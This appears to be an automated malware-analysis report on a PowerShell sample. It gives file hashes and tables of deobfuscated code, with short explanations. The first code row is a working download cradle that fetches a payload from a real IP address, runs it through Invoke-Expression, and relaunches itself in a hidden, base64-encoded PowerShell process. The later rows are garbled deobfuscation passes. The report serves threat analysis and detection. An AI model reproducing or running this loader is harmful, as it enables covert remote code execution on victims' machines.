| Hash | Hash Value |
|---|---|
| MD5 | 2106ad19ac89d02c6e57cd97e2039dce |
| Sha1 | 3e7ce589420cc0d7901859fea4fc64a551e1470f |
| Sha256 | 33d4101dc18a5a6ff3fcaf12b38e6b294bfb3ad188d4dc0a7320690de750af7d |
| Sha384 | 70d8a09282d25cab37d96e2061b3dea0699ae5d1dabde91ce8912406355ab4bebc27b75240f027edd9670ae453b8f18f |
| Sha512 | 48adc0c31518037777145e8a955393abf394b2f76b89d34f87a336068c52c78ca4d0e72e687839940753c0b8fe840e22409aedf89bf4432f9b3cd70711c7042b |
| SSDeep | 12:ZYL+w+RQ/0wuzDB2cd0JNPT6bB4wKAH+LgyaICQZ2MhA9nCEFoI1kD1:ZYL+H2/bul+16bB4v0+LAQ7hAlPqD1 |
| TLSH | 09F005025FB159EACED68146D0454500A45F38693349395135E06E702DCC0FD94360E0 |
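
The script fetches text from the URL through the `MSXML2.XMLHTTP` COM object, passes the response to `Invoke-Expression`, and runs this in a child `powershell.exe` started with `-WindowStyle Hidden` and `-EncodedCommand`. Only the first row keeps the `@"…"@` here-string intact; the later rows appear to be repeated deobfuscation passes over the same content in which the here-string body is lost (`$psCode = ""`, a stray `"@`, `$u` never assigned), so they are not valid PowerShell as printed. The `??????` in the error message is presumably non-ASCII text lost in extraction.

| Name0 | Value |
|---|---|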
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |

The trailing `Malicious` in each Value cell appears to be the tool's verdict label fused into the cell; Location gives the sample's MD5 followed by one `[Deobfuscated PS]` step per deobfuscation pass.

| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" Malicious | 2106ad19ac89d02c6e57cd97e2039dce |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | 2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | 2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious | 2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |